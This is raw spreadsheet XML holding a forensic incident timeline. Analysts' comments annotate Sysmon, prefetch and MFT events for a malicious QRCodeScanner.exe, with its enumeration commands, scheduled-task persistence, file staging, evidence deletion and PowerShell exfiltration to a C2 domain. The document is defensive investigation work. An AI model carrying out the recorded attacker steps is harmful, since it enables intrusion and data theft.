    <t>Event ID: 3 Network Connection from elevated QRCodeScanner.exe (Admin) to site-proxy.site.lan (172.16.2.6:8080)</t>
  </si>
  <si>
    <t>Likely privilege escalation persistence communication</t>
  </si>
  <si>
    <t>Late communication attempt suggesting ongoing outbound C2 traffic</t>
  </si>
  <si>
    <t xml:space="preserve"> AM</t>
  </si>
  <si>
    <t>Event ID: 1 ProcessCreate - cmd.exe executed 'cmd /c dir' launched by QRCodeScanner.exe</t>
  </si>
  <si>
    <t>System enumeration initiated by QRCodeScanner.exe</t>
  </si>
  <si>
    <t>Event ID: 1 ProcessCreate - cmd.exe executed 'cmd /c set' launched by QRCodeScanner.exe</t>
  </si>
  <si>
    <t>Environment variable listing performed by QRCodeScanner.exe</t>
  </si>
  <si>
    <t>Event ID: 1 ProcessCreate - cmd.exe executed 'cmd /c ver' launched by QRCodeScanner.exe</t>
  </si>
  <si>
    <t>System version information retrieved by QRCodeScanner.exe</t>
  </si>
  <si>
    <t>Event ID: 1 ProcessCreate - cmd.exe executed 'cmd /c path' launched by QRCodeScanner.exe</t>
  </si>
  <si>
    <t>System path enumeration executed via QRCodeScanner.exe</t>
  </si>
  <si>
    <t>Event ID: 1 ProcessCreate - cmd.exe executed schtasks.exe to create 'ThreadCleaner' task on ACC-WIN10-13</t>
  </si>
  <si>
    <t>Persistence mechanism created via scheduled task for remote execution</t>
  </si>
  <si>
    <t>Event ID: 1 ProcessCreate - schtasks.exe created task 'ThreadCleaner' to run QRCodeScanner.exe on ACC-WIN10-13</t>
  </si>
  <si>
    <t>Scheduled task established to execute QRCodeScanner remotely</t>
  </si>
  <si>
    <t>Event ID: 1 ProcessCreate - cmd.exe copied QRCodeScanner.exe to C:\Windows\Vss\vixDiskMountServer.exe</t>
  </si>
  <si>
    <t>QRCodeScanner copied for persistence or privilege evasion</t>
  </si>
  <si>
    <t>Event ID: 1 ProcessCreate - cmd.exe executed 'cmd /c del C:\Windows\vss\secrets.txt' launched by QRCodeScanner.exe</t>
  </si>
  <si>
    <t>Data cleanup or artifact removal by malicious process</t>
  </si>
  <si>
    <t>Event ID: 1 ProcessCreate - cmd.exe executed 'cmd /c del C:\Windows\vss\secrets.zip' launched by QRCodeScanner.exe</t>
  </si>
  <si>
    <t>Evidence deletion performed post exfiltration</t>
  </si>
  <si>
    <t>Event ID: 1 ProcessCreate - PowerShell executed data exfiltration script using Invoke-RestMethod to http://s4ltybug.com//</t>
  </si>
  <si>
    <t>Potential data exfiltration detected via PowerShell</t>
  </si>
  <si>
    <t>Event ID: 1 ProcessCreate - PowerShell executed data exfiltration POST request to http://s4ltybug.com//</t>
  </si>
  <si>
    <t>Repeated outbound PowerShell connection for data exfiltration</t>
  </si>
  <si>
    <t>Event ID: 1 ProcessCreate - PowerShell copied random user file to C:\Windows\vss\secret2.file</t>
  </si>
  <si>
    <t>Sensitive data staged locally before exfiltration</t>
  </si>
  <si>
    <t>Event ID: 1 ProcessCreate - PowerShell copied random user file to C:\Windows\vss\secret1.file</t>
  </si>
  <si>
    <t>Sensitive file staging operation observed</t>
  </si>
  <si>
    <t>Event ID: 1 ProcessCreate - PowerShell created scheduled task 'ThreadCleaner' executing vixDiskMountServer.exe</t>
  </si>
  <si>
    <t>Persistence established using PowerShell scheduled task</t>
  </si>
  <si>
    <t>Event ID: 1 ProcessCreate - PowerShell executed 'net groups Domain Admins /domain'</t>
  </si>
  <si>
    <t>Privilege enumeration attempt using PowerShell</t>
  </si>
  <si>
    <t>Event ID: 1 ProcessCreate - PowerShell executed 'net groups Domain Controllers /domain'</t>
  </si>
  <si>
    <t>Reconnaissance of domain controllers via PowerShell</t>
  </si>
  <si>
    <t>Event ID: 1 ProcessCreate - PowerShell executed 'net groups Domain Computers /domain'</t>
  </si>
  <si>
    <t>Domain reconnaissance via PowerShell command</t>
  </si>
  <si>
    <t>Event ID: 1 ProcessCreate - QRCodeScanner.exe executed with elevated privileges by PowerShell</t>
  </si>
  <si>
    <t>Execution of QRCodeScanner.exe with admin privileges</t>
  </si>
  <si>
    <t>Event ID: 1 ProcessCreate - PowerShell spawned elevated process to execute QRCodeScanner.exe</t>
  </si>
  <si>
    <t>Privilege escalation via PowerShell credential invocation</t>
  </si>
  <si>
    <t>Event ID: 1 ProcessCreate - PowerShell attempted to elevate privileges and execute QRCodeScanner.exe</t>
  </si>
  <si>
    <t>Initial privilege escalation attempt using PowerShell credentials</t>
  </si>
  <si>
    <t>src_ip=172.16.6.116 src_port=60485 dest_ip=3.64.168.50 dest_port=80 http_method=POST url="http://s4ltybug.com/" bytes_out=104</t>
  </si>
  <si>
    <t>Outbound POST request consistent with C2 exfil attempt</t>
  </si>
  <si>
    <t>src_ip=172.16.6.116 src_port=60501 dest_ip=3.64.168.50 dest_port=80 http_method=POST url="http://s4ltybug.com/" bytes_out=87</t>
  </si>
  <si>
    <t>Repeated POST—malware beaconing behavior</t>
  </si>
  <si>
    <t>src_ip=172.16.6.116 src_port=60528 dest_ip=3.64.168.50 dest_port=80 http_method=POST url="http://s4ltybug.com/" bytes_out=96</t>
  </si>
  <si>
    <t>Consistent POST interval suggests automated malware loop</t>
  </si>
  <si>
    <t>src_ip=172.16.6.116 src_port=60577 dest_ip=3.64.168.50 dest_port=80 http_method=POST url="http://s4ltybug.com/" bytes_out=104</t>
  </si>
  <si>
    <t>Beaconing to known malicious host</t>
  </si>
  <si>
    <t>src_ip=172.16.6.116 src_port=60602 dest_ip=3.64.168.50 dest_port=80 http_method=POST url="http://s4ltybug.com/" bytes_out=128</t>
  </si>
  <si>
    <t>Data-transfer sized POST—possible sensitive file exfiltration</t>
  </si>
  <si>
    <t>src_ip=172.16.6.116 src_port=60655 dest_ip=3.64.168.50 dest_port=80 http_method=POST url="http://s4ltybug.com/" bytes_out=98</t>
  </si>
  <si>
    <t>Malware maintains active C2 channel</t>
  </si>
  <si>
    <t>src_ip=172.16.6.116 src_port=60712 dest_ip=3.64.168.50 dest_port=80 http_method=POST url="http://s4ltybug.com/" bytes_out=132</t>
  </si>
  <si>
    <t>Likely exfiltration of randomly harvested file</t>
  </si>
  <si>
    <t>src_ip=172.16.6.116 src_port=60777 dest_ip=3.64.168.50 dest_port=80 http_method=POST url="http://s4ltybug.com/" bytes_out=90</t>
  </si>
  <si>
    <t>Small consistent POST activity—heartbeat beacon</t>
  </si>
  <si>
    <t>src_ip=172.16.6.116 src_port=60833 dest_ip=3.64.168.50 dest_port=80 http_method=POST url="http://s4ltybug.com/" bytes_out=115</t>
  </si>
  <si>
    <t>C2 still active during lateral movement period</t>
  </si>
  <si>
    <t>src_ip=172.16.6.116 src_port=60866 dest_ip=3.64.168.50 dest_port=80 http_method=POST url="http://s4ltybug.com/" bytes_out=143</t>
  </si>
  <si>
    <t>Large POST payload—likely exfil of significant file</t>
  </si>
  <si>
    <t>src_ip=172.16.6.116 src_port=58198 dest_ip=3.75.96.66 dest_port=80 http_method=GET url="http://s4ltybug.com/Style.dat" UserAgent="Mozilla/5.0 (Windows NT 10.0; Win64; x64)..."</t>
  </si>
  <si>
    <t>Repeated beaconing request to C2 domain s4ltybug.com.</t>
  </si>
  <si>
    <t>src_ip=172.16.6.116 src_port=58202 dest_ip=3.75.96.66 dest_port=80 http_method=GET url="http://s4ltybug.com/Style.dat" UserAgent="Mozilla/5.0 (Windows NT 10.0; Win64; x64)..."</t>
  </si>
  <si>
    <t>Short-interval beaconing consistent with C2 check-in.</t>
  </si>
  <si>
    <t>src_ip=172.16.6.116 src_port=58204 dest_ip=3.75.96.66 dest_port=80 http_method=GET url="http://s4ltybug.com/SysLog.dat" UserAgent="Mozilla/5.0 (Windows NT 10.0; Win64; x64)..."</t>
  </si>
  <si>
    <t>C2 retrieving system log data from infected host.</t>
  </si>
  <si>
    <t>src_ip=172.16.6.116 src_port=58205 dest_ip=3.75.96.66 dest_port=80 http_method=GET url="http://s4ltybug.com/QLog.dat" UserAgent="Mozilla/5.0 (Windows NT 10.0; Win64; x64)..."</t>
  </si>
  <si>
    <t>Host requests QLog.dat — likely internal info exfil beacon.</t>
  </si>
  <si>
    <t>src_ip=172.16.6.116 src_port=58211 dest_ip=3.75.96.66 dest_port=80 http_method=GET url="http://s4ltybug.com/File.dat" UserAgent="Mozilla/5.0 (Windows NT 10.0; Win64; x64)..."</t>
  </si>
  <si>
    <t>Malware checking for file-related C2 tasks.</t>
  </si>
  <si>
    <t>src_ip=172.16.6.116 src_port=58213 dest_ip=3.75.96.66 dest_port=80 http_method=GET url="http://s4ltybug.com/Clean.dat" UserAgent="Mozilla/5.0 (Windows NT 10.0; Win64; x64)..."</t>
  </si>
  <si>
    <t>Clean.dat beacon indicates potential cleanup/self-delete instructions.</t>
  </si>
  <si>
    <t>src_ip=172.16.6.116 src_port=58215 dest_ip=3.75.96.66 dest_port=80 http_method=GET url="http://s4ltybug.com/Thread.dat" UserAgent="Mozilla/5.0 (Windows NT 10.0; Win64; x64)..."</t>
  </si>
  <si>
    <t>Malware retrieving thread management instructions from C2.</t>
  </si>
  <si>
    <t>src_ip=172.16.6.116 src_port=58217 dest_ip=3.75.96.66 dest_port=80 http_method=GET url="http://s4ltybug.com/Sync.dat" UserAgent="Mozilla/5.0 (Windows NT 10.0; Win64; x64)..."</t>
  </si>
  <si>
    <t>Beaconing to synchronize instructions with C2 server.</t>
  </si>
  <si>
    <t>src_ip=172.16.6.116 src_port=58220 dest_ip=3.75.96.66 dest_port=80 http_method=GET url="http://s4ltybug.com/Load.dat" UserAgent="Mozilla/5.0 (Windows NT 10.0; Win64; x64)..."</t>
  </si>
  <si>
    <t>Possible retrieval of additional payload or command module.</t>
  </si>
  <si>
    <t>src_ip=172.16.6.116 src_port=58225 dest_ip=3.75.96.66 dest_port=80 http_method=GET url="http://s4ltybug.com/Run.dat" UserAgent="Mozilla/5.0 (Windows NT 10.0; Win64; x64)..."</t>
  </si>
  <si>
    <t>C2 command file indicating execution of queued actions.</t>
  </si>
  <si>
    <t>src_ip=172.16.6.116 src_port=58227 dest_ip=3.75.96.66 dest_port=80 http_method=GET url="http://s4ltybug.com/Process.dat" UserAgent="Mozilla/5.0 (Windows NT 10.0; Win64; x64)..."</t>
  </si>
  <si>
    <t>Beacon retrieving process-related command details.</t>
  </si>
  <si>
    <t>src_ip=172.16.6.116 src_port=58229 dest_ip=3.75.96.66 dest_port=80 http_method=GET url="http://s4ltybug.com/Status.dat" UserAgent="Mozilla/5.0 (Windows NT 10.0; Win64; x64)..."</t>
  </si>
  <si>
    <t>Malware reporting status back to the C2 server.</t>
  </si>
  <si>
    <t>Prefetch</t>
  </si>
  <si>
    <t>Prefetch entry for C:\Users\Public\QRCodeScanner.exe shows FIRST run time 2025-06-25 11:19:39 with run count = 2.</t>
  </si>
  <si>
    <t>PECmd - Prefetch artifacts</t>
  </si>
  <si>
    <t>Corroborates initial execution of downloaded malware QRCodeScanner.exe on ACC-WIN10-16.</t>
  </si>
  <si>
    <t>Prefetch entry for C:\Users\Public\QRCodeScanner.exe shows LAST run time 2025-06-25 11:20:17.</t>
  </si>
  <si>
    <t>Lines up with C2 registration and early POST activity to saltybug.com.</t>
  </si>
  <si>
    <t>Prefetch file for C:\Users\Public\QRCodeScanner.exe created at 2025-06-25 11:19:49 and later modified at 11:20:27.</t>
  </si>
  <si>
    <t>Shows Windows recording prefetch for the new executable and continued execution during the compromise window.</t>
  </si>
  <si>
    <t>ACC-WIN10-16</t>
  </si>
  <si>
    <t>Shellbags - First Interaction</t>
  </si>
  <si>
    <t>Directory interaction: KAPE_acc-win10-16 first accessed in Explorer.</t>
  </si>
  <si>
    <t>SBECmd / ShellBags</t>
  </si>
  <si>
    <t>Shows early forensic activity before day of compromise.</t>
  </si>
  <si>
    <t>Desktop\My Computer\E:\ directory first interacted with.</t>
  </si>
  <si>
    <t>User accessed evidence drive on compromised date.</t>
  </si>
  <si>
    <t>ACC-WIN10-13</t>
  </si>
  <si>
    <t>Directory C:\temp\ramcapturex64 first interacted with.</t>
  </si>
  <si>
    <t>Indicates tool usage prior to compromise period.</t>
  </si>
  <si>
    <t>QRCodeScanner.exe prefetch file modified at 11:20:27 during execution.</t>
  </si>
  <si>
    <t>PECmd</t>
  </si>
  <si>
    <t>Confirms repeated execution during C2 registration.</t>
  </si>
  <si>
    <t>MFT</t>
  </si>
  <si>
    <t>Creation time for qrcodescanner.exe recorded at 2025-06-25 11:38:15 (SI-&gt;Created x10).</t>
  </si>
  <si>
    <t>MFTECmd</t>
  </si>
  <si>
    <t>This matches the moment malware was placed on disk.</t>
  </si>
  <si>
    <t>Entry 159423 corresponds to secret1.file.</t>
  </si>
  <si>
    <t xml:space="preserve">Confirms presence of staged exfiltration material. </t>
  </si>
  <si>
    <t>Entry 160107 corresponds to qrcodescanner.exe.</t>
  </si>
  <si>
    <t>Shows malware persisted on ACC-WIN10-13 as well.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</si>
</sst>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409]h:mm:ss\ AM/PM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3" fillId="36" borderId="0" xfId="0" applyFont="1" applyFill="1"/>
    <xf numFmtId="0" fontId="13" fillId="37" borderId="0" xfId="0" applyFont="1" applyFill="1"/>
    <xf numFmtId="0" fontId="13" fillId="38" borderId="0" xfId="0" applyFont="1" applyFill="1"/>
    <xf numFmtId="14" fontId="0" fillId="0" borderId="0" xfId="0" applyNumberFormat="1"/>
    <xf numFmtId="0" fontId="0" fillId="39" borderId="0" xfId="0" applyFill="1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left"/>
    </xf>
    <xf numFmtId="165" fontId="0" fillId="0" borderId="0" xfId="0" applyNumberFormat="1"/>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf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color theme="0"/>
      </font>
      <fill>
        <patternFill>
          <bgColor theme="1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ill>
        <patternFill>
          <bgColor theme="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zoomScaleNormal="100" workbookViewId="0">
      <pane ySplit="1" topLeftCell="A158" activePane="bottomLeft" state="frozen"/>
      <selection pane="bottomLeft" activeCell="F185" sqref="F185"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultRowHeight="15"/>
  <cols>
    <col min="1" max="1" width="10.85546875" style="7" bestFit="1" customWidth="1"/>
    <col min="2" max="2" width="12.7109375" style="12" bestFit="1" customWidth="1"/>
    <col min="3" max="3" width="17.140625" customWidth="1"/>
    <col min="4" max="4" width="33" customWidth="1"/>
    <col min="5" max="5" width="17.42578125" style="8" customWidth="1"/>
    <col min="6" max="6" width="85.7109375" customWidth="1"/>
    <col min="7" max="7" width="47.7109375" customWidth="1"/>
    <col min="8" max="8" width="72.42578125" customWidth="1"/>
    <col min="9" max="9" width="40.28515625" customWidth="1"/>
    <col min="10" max="11" width="81.140625" bestFit="1" customWidth="1"/>
    <col min="12" max="12" width="7.5703125" bestFit="1" customWidth="1"/>
    <col min="13" max="15" width="81.140625" bestFit="1" customWidth="1"/>
    <col min="16" max="16" width="22.140625" bestFit="1" customWidth="1"/>
    <col min="17" max="17" width="54.5703125" bestFit="1" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:8">
      <c r="A1" s="7" t="s">
        <v>7</v>
      </c>
      <c r="B1" s="11" t="s">
        <v>233</v>
      </c>
      <c r="C1" s="9" t="s">
        <v>8</v>
      </c>
      <c r="D1" s="9" t="s">
        <v>9</v>
      </c>
      <c r="E1" s="9" t="s">
        <v>10</v>
      </c>
      <c r="F1" s="10" t="s">
        <v>11</v>
      </c>
      <c r="G1" s="10" t="s">
        <v>12</v>
      </c>
      <c r="H1" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="2" spans="1:8">
      <c r="A2" s="7">
        <v>45833</v>
      </c>
      <c r="B2" s="12">
        <v>0.46971064814814817</v>
      </c>
      <c r="C2" t="s">
        <v>33</v>
      </c>
      <c r="D2" t="s">
        <v>18</v>
      </c>
      <c r="E2" s="8" t="s">
        <v>34</v>
      </c>
      <c r="F2" s="13" t="s">
        <v>35</v>
      </c>
      <c r="G2" t="s">
        <v>44</v>
      </c>
      <c r="H2" s="13" t="s">
        <v>36</v>
      </c>
    </row>
    <row r="3" spans="1:8">
      <c r="A3" s="7">
        <v>45833</v>
      </c>
      <c r="B3" s="14">
        <v>0.47</v>
      </c>
      <c r="C3" t="s">
        <v>206</v>
      </c>
      <c r="D3" t="s">
        <v>21</v>
      </c>
      <c r="E3" t="s">
        <v>17</v>
      </c>
      <c r="F3" t="s">
        <v>207</v>
      </c>
      <c r="G3" t="s">
        <v>16</v>
      </c>
      <c r="H3" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="4" spans="1:8">
      <c r="A4" s="7">
        <v>45833</v>
      </c>
      <c r="B4" s="14">
        <v>0.47</v>
      </c>
      <c r="C4" t="s">
        <v>206</v>
      </c>
      <c r="D4" t="s">
        <v>21</v>
      </c>
      <c r="E4" t="s">
        <v>17</v>
      </c>
      <c r="F4" t="s">
        <v>209</v>
      </c>
      <c r="G4" t="s">
        <v>16</v>
      </c>
      <c r="H4" t="s">
        <v>210</v>
      </c>
    </row>
    <row r="5" spans="1:8">
      <c r="A5" s="7">
        <v>45833</v>
      </c>
      <c r="B5" s="14">
        <v>0.47</v>
      </c>
      <c r="C5" t="s">
        <v>206</v>
      </c>
      <c r="D5" t="s">
        <v>21</v>
      </c>
      <c r="E5" t="s">
        <v>17</v>
      </c>
      <c r="F5" t="s">
        <v>211</v>
      </c>
      <c r="G5" t="s">
        <v>16</v>
      </c>
      <c r="H5" t="s">
        <v>212</v>
      </c>
    </row>
    <row r="6" spans="1:8">
      <c r="A6" s="7">
        <v>45833</v>
      </c>
      <c r="B6" s="14">
        <v>0.47</v>
      </c>
      <c r="C6" t="s">
        <v>206</v>
      </c>
      <c r="D6" t="s">
        <v>21</v>
      </c>
      <c r="E6" t="s">
        <v>17</v>
      </c>
      <c r="F6" t="s">
        <v>213</v>
      </c>
      <c r="G6" t="s">
        <v>16</v>
      </c>
      <c r="H6" t="s">
        <v>214</v>
      </c>
    </row>
    <row r="7" spans="1:8">
      <c r="A7" s="7">
        <v>45833</v>
      </c>
      <c r="B7" s="14">
        <v>0.47</v>
      </c>
      <c r="C7" t="s">
        <v>206</v>
      </c>
      <c r="D7" t="s">
        <v>21</v>
      </c>
      <c r="E7" t="s">
        <v>17</v>
      </c>
      <c r="F7" t="s">
        <v>215</v>
      </c>
      <c r="G7" t="s">
        <v>16</v>
      </c>
      <c r="H7" t="s">
        <v>216</v>
      </c>
    </row>
    <row r="8" spans="1:8">
      <c r="A8" s="7">
        <v>45833</v>
      </c>
      <c r="B8" s="14">
        <v>0.4700347222222222</v>
      </c>
      <c r="C8" t="s">
        <v>142</v>
      </c>
      <c r="D8" t="s">
        <v>18</v>
      </c>
      <c r="E8" t="s">
        <v>17</v>
      </c>
      <c r="F8" t="s">
        <v>207</v>
      </c>
      <c r="G8" t="s">
        <v>16</v>
      </c>
      <c r="H8" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="9" spans="1:8">
      <c r="A9" s="7">
        <v>45833</v>
      </c>
      <c r="B9" s="14">
        <v>0.4700347222222222</v>
      </c>
      <c r="C9" t="s">
        <v>142</v>
      </c>
      <c r="D9" t="s">
        <v>18</v>
      </c>
      <c r="E9" t="s">
        <v>17</v>
      </c>
      <c r="F9" t="s">
        <v>209</v>
      </c>
      <c r="G9" t="s">
        <v>16</v>
      </c>
      <c r="H9" t="s">
        <v>210</v>
      </c>
    </row>
    <row r="10" spans="1:8">
      <c r="A10" s="7">
        <v>45833</v>
      </c>
      <c r="B10" s="14">
        <v>0.4700347222222222</v>
      </c>
      <c r="C10" t="s">
        <v>142</v>
      </c>
      <c r="D10" t="s">
        <v>18</v>
      </c>
      <c r="E10" t="s">
        <v>17</v>
      </c>
      <c r="F10" t="s">
        <v>211</v>
      </c>
      <c r="G10" t="s">
        <v>16</v>
      </c>
      <c r="H10" t="s">
        <v>212</v>
      </c>
    </row>
    <row r="11" spans="1:8">
      <c r="A11" s="7">
        <v>45833</v>
      </c>
      <c r="B11" s="14">
        <v>0.4700347222222222</v>
      </c>
      <c r="C11" t="s">
        <v>142</v>
      </c>
      <c r="D11" t="s">
        <v>18</v>
      </c>
      <c r="E11" t="s">
        <v>17</v>
      </c>
      <c r="F11" t="s">
        <v>213</v>
      </c>
      <c r="G11" t="s">
        <v>16</v>
      </c>
      <c r="H11" t="s">
        <v>214</v>
      </c>
    </row>
    <row r="12" spans="1:8">
      <c r="A12" s="7">
        <v>45833</v>
      </c>
      <c r="B12" s="14">
        <v>0.4700347222222222</v>
      </c>
      <c r="C12" t="s">
        <v>142</v>
      </c>
      <c r="D12" t="s">
        <v>18</v>
      </c>
      <c r="E12" t="s">
        <v>17</v>
      </c>
      <c r="F12" t="s">
        <v>215</v>
      </c>
      <c r="G12" t="s">
        <v>16</v>
      </c>
      <c r="H12" t="s">
        <v>216</v>
      </c>
    </row>
    <row r="13" spans="1:8">
      <c r="A13" s="7">
        <v>45833</v>
      </c>
      <c r="B13" s="12">
        <v>0.47005787037037039</v>
      </c>
      <c r="C13" t="s">
        <v>25</v>
      </c>
      <c r="D13" t="s">
        <v>26</v>
      </c>
      <c r="E13" s="8" t="s">
        <v>15</v>
      </c>
      <c r="F13" t="s">
        <v>27</v>
      </c>
      <c r="G13" t="s">
        <v>54</v>
      </c>
      <c r="H13" t="s">
        <v>28</v>
      </c>
    </row>
    <row r="14" spans="1:8">
      <c r="A14" s="7">
        <v>45833</v>
      </c>
      <c r="B14" s="12">
        <v>0.47189814814814812</v>
      </c>
      <c r="C14" t="s">
        <v>25</v>
      </c>
      <c r="D14" t="s">
        <v>29</v>
      </c>
      <c r="E14" s="8" t="s">
        <v>14</v>
      </c>
      <c r="F14" t="s">
        <v>30</v>
      </c>
      <c r="G14" t="s">
        <v>31</v>
      </c>
      <c r="H14" t="s">
        <v>32</v>
      </c>
    </row>
    <row r="15" spans="1:8">
      <c r="A15" s="7">
        <v>45833</v>
      </c>
      <c r="B15" s="12">
        <v>0.47189814814814812</v>
      </c>
      <c r="C15" t="s">
        <v>25</v>
      </c>
      <c r="D15" t="s">
        <v>18</v>
      </c>
      <c r="E15" s="8" t="s">
        <v>17</v>
      </c>
      <c r="F15" t="s">
        <v>22</v>
      </c>
      <c r="G15" t="s">
        <v>16</v>
      </c>
      <c r="H15" t="s">
        <v>19</v>
      </c>
    </row>
    <row r="16" spans="1:8">
      <c r="A16" s="7">
        <v>45833</v>
      </c>
      <c r="B16" s="12">
        <v>0.47189814814814812</v>
      </c>
      <c r="C16" t="s">
        <v>25</v>
      </c>
      <c r="D16" t="s">
        <v>29</v>
      </c>
      <c r="E16" t="s">
        <v>14</v>
      </c>
      <c r="F16" t="s">
        <v>78</v>
      </c>
      <c r="G16" t="s">
        <v>31</v>
      </c>
      <c r="H16" t="s">
        <v>32</v>
      </c>
    </row>
    <row r="17" spans="1:9">
      <c r="A17" s="7">
        <v>45833</v>
      </c>
      <c r="B17" s="12">
        <v>0.47196759259259258</v>
      </c>
      <c r="C17" t="s">
        <v>25</v>
      </c>
      <c r="D17" t="s">
        <v>29</v>
      </c>
      <c r="E17" t="s">
        <v>14</v>
      </c>
      <c r="F17" t="s">
        <v>79</v>
      </c>
      <c r="G17" t="s">
        <v>31</v>
      </c>
      <c r="H17" t="s">
        <v>80</v>
      </c>
    </row>
    <row r="18" spans="1:9">
      <c r="A18" s="7">
        <v>45833</v>
      </c>
      <c r="B18" s="12">
        <v>0.47197916666666667</v>
      </c>
      <c r="C18" t="s">
        <v>25</v>
      </c>
      <c r="D18" t="s">
        <v>29</v>
      </c>
      <c r="E18" s="8" t="s">
        <v>318</v>
      </c>
      <c r="F18" t="s">
        <v>319</v>
      </c>
      <c r="G18" t="s">
        <v>320</v>
      </c>
      <c r="H18" t="s">
        <v>321</v>
      </c>
    </row>
    <row r="19" spans="1:9">
      <c r="A19" s="7">
        <v>45833</v>
      </c>
      <c r="B19" s="12">
        <v>0.47209490740740739</v>
      </c>
      <c r="C19" t="s">
        <v>25</v>
      </c>
      <c r="D19" t="s">
        <v>29</v>
      </c>
      <c r="E19" s="8" t="s">
        <v>318</v>
      </c>
      <c r="F19" t="s">
        <v>324</v>
      </c>
      <c r="G19" t="s">
        <v>320</v>
      </c>
      <c r="H19" t="s">
        <v>325</v>
      </c>
    </row>
    <row r="20" spans="1:9">
      <c r="A20" s="7">
        <v>45833</v>
      </c>
      <c r="B20" s="12">
        <v>0.47237268518518516</v>
      </c>
      <c r="C20" t="s">
        <v>20</v>
      </c>
      <c r="D20" s="13" t="s">
        <v>18</v>
      </c>
      <c r="E20" s="8" t="s">
        <v>17</v>
      </c>
      <c r="F20" s="13" t="s">
        <v>39</v>
      </c>
      <c r="G20" t="s">
        <v>16</v>
      </c>
      <c r="H20" s="13" t="s">
        <v>40</v>
      </c>
    </row>
    <row r="21" spans="1:9">
      <c r="A21" s="7">
        <v>45833</v>
      </c>
      <c r="B21" s="12">
        <v>0.47237268518518516</v>
      </c>
      <c r="C21" t="s">
        <v>25</v>
      </c>
      <c r="D21" t="s">
        <v>18</v>
      </c>
      <c r="E21" s="8" t="s">
        <v>34</v>
      </c>
      <c r="F21" t="s">
        <v>43</v>
      </c>
      <c r="G21" t="s">
        <v>44</v>
      </c>
      <c r="H21" s="13" t="s">
        <v>49</v>
      </c>
    </row>
    <row r="22" spans="1:9">
      <c r="A22" s="7">
        <v>45833</v>
      </c>
      <c r="B22" s="12">
        <v>0.47237268518518516</v>
      </c>
      <c r="C22" t="s">
        <v>25</v>
      </c>
      <c r="D22" t="s">
        <v>18</v>
      </c>
      <c r="E22" s="8" t="s">
        <v>34</v>
      </c>
      <c r="F22" t="s">
        <v>45</v>
      </c>
      <c r="G22" t="s">
        <v>44</v>
      </c>
      <c r="H22" t="s">
        <v>49</v>
      </c>
    </row>
    <row r="23" spans="1:9">
      <c r="A23" s="7">
        <v>45833</v>
      </c>
      <c r="B23" s="12">
        <v>0.47237268518518516</v>
      </c>
      <c r="C23" t="s">
        <v>25</v>
      </c>
      <c r="D23" t="s">
        <v>18</v>
      </c>
      <c r="E23" s="8" t="s">
        <v>34</v>
      </c>
      <c r="F23" t="s">
        <v>46</v>
      </c>
      <c r="G23" t="s">
        <v>44</v>
      </c>
      <c r="H23" t="s">
        <v>49</v>
      </c>
    </row>
    <row r="24" spans="1:9">
      <c r="A24" s="7">
        <v>45833</v>
      </c>
      <c r="B24" s="12">
        <v>0.47237268518518516</v>
      </c>
      <c r="C24" t="s">
        <v>142</v>
      </c>
      <c r="D24" t="s">
        <v>18</v>
      </c>
      <c r="E24" t="s">
        <v>17</v>
      </c>
      <c r="F24" t="s">
        <v>150</v>
      </c>
      <c r="G24" t="s">
        <v>16</v>
      </c>
      <c r="H24" t="s">
        <v>151</v>
      </c>
    </row>
    <row r="25" spans="1:9">
      <c r="A25" s="7">
        <v>45833</v>
      </c>
      <c r="B25" s="12">
        <v>0.47237268518518516</v>
      </c>
      <c r="C25" t="s">
        <v>142</v>
      </c>
      <c r="D25" t="s">
        <v>18</v>
      </c>
      <c r="E25" s="8" t="s">
        <v>17</v>
      </c>
      <c r="F25" t="s">
        <v>217</v>
      </c>
      <c r="G25" t="s">
        <v>16</v>
      </c>
      <c r="H25" t="s">
        <v>218</v>
      </c>
      <c r="I25" t="s">
        <v>219</v>
      </c>
    </row>
    <row r="26" spans="1:9">
      <c r="A26" s="7">
        <v>45833</v>
      </c>
      <c r="B26" s="14">
        <v>0.47237268518518516</v>
      </c>
      <c r="C26" t="s">
        <v>142</v>
      </c>
      <c r="D26" t="s">
        <v>18</v>
      </c>
      <c r="E26" t="s">
        <v>17</v>
      </c>
      <c r="F26" t="s">
        <v>272</v>
      </c>
      <c r="G26" t="s">
        <v>16</v>
      </c>
      <c r="H26" t="s">
        <v>273</v>
      </c>
    </row>
    <row r="27" spans="1:9">
      <c r="A27" s="7">
        <v>45833</v>
      </c>
      <c r="B27" s="12">
        <v>0.47239583333333335</v>
      </c>
      <c r="C27" t="s">
        <v>25</v>
      </c>
      <c r="D27" t="s">
        <v>18</v>
      </c>
      <c r="E27" s="8" t="s">
        <v>34</v>
      </c>
      <c r="F27" t="s">
        <v>47</v>
      </c>
      <c r="G27" t="s">
        <v>44</v>
      </c>
      <c r="H27" t="s">
        <v>49</v>
      </c>
    </row>
    <row r="28" spans="1:9">
      <c r="A28" s="7">
        <v>45833</v>
      </c>
      <c r="B28" s="12">
        <v>0.47240740740740739</v>
      </c>
      <c r="C28" t="s">
        <v>25</v>
      </c>
      <c r="D28" t="s">
        <v>29</v>
      </c>
      <c r="E28" s="8" t="s">
        <v>34</v>
      </c>
      <c r="F28" s="13" t="s">
        <v>41</v>
      </c>
      <c r="G28" t="s">
        <v>44</v>
      </c>
      <c r="H28" s="13" t="s">
        <v>42</v>
      </c>
    </row>
    <row r="29" spans="1:9">
      <c r="A29" s="7">
        <v>45833</v>
      </c>
      <c r="B29" s="12">
        <v>0.47240740740740739</v>
      </c>
      <c r="C29" t="s">
        <v>25</v>
      </c>
      <c r="D29" t="s">
        <v>18</v>
      </c>
      <c r="E29" s="8" t="s">
        <v>34</v>
      </c>
      <c r="F29" t="s">
        <v>48</v>
      </c>
      <c r="G29" t="s">
        <v>44</v>
      </c>
      <c r="H29" t="s">
        <v>49</v>
      </c>
    </row>
    <row r="30" spans="1:9">
      <c r="A30" s="7">
        <v>45833</v>
      </c>
      <c r="B30" s="12">
        <v>0.47240740740740739</v>
      </c>
      <c r="C30" t="s">
        <v>143</v>
      </c>
      <c r="D30" t="s">
        <v>18</v>
      </c>
      <c r="E30" t="s">
        <v>17</v>
      </c>
      <c r="F30" t="s">
        <v>152</v>
      </c>
      <c r="G30" t="s">
        <v>16</v>
      </c>
      <c r="H30" t="s">
        <v>153</v>
      </c>
    </row>
    <row r="31" spans="1:9">
      <c r="A31" s="7">
